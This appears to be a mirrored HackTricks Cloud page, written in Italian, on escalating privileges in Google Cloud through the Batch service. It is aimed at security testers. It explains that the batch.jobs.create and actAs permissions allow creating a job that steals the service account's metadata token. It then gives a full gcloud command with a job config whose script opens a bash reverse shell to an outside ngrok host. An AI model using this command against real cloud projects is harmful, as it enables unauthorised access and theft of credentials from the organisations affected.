mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2026-01-06 09:43:42 -08:00
1.0 KiB
1.0 KiB
GCP - Batch Privesc
{{#include ../../../banners/hacktricks-training.md}}
Batch
Informazioni di base:
{{#ref}} ../gcp-services/gcp-batch-enum.md {{#endref}}
batch.jobs.create, iam.serviceAccounts.actAs
È possibile creare un lavoro batch, ottenere una reverse shell ed esfiltrare il token di metadata del SA (compute SA per impostazione predefinita).
gcloud beta batch jobs submit job-lxo3b2ub --location us-east1 --config - <<EOD
{
"name": "projects/gcp-labs-35jfenjy/locations/us-central1/jobs/job-lxo3b2ub",
"taskGroups": [
{
"taskCount": "1",
"parallelism": "1",
"taskSpec": {
"computeResource": {
"cpuMilli": "1000",
"memoryMib": "512"
},
"runnables": [
{
"script": {
"text": "/bin/bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/10396 0>&1'\n"
}
}
],
"volumes": []
}
}
],
"allocationPolicy": {
"instances": [
{
"policy": {
"provisioningModel": "STANDARD",
"machineType": "e2-micro"
}
}
]
},
"logsPolicy": {
"destination": "CLOUD_LOGGING"
}
}
EOD
{{#include ../../../banners/hacktricks-training.md}}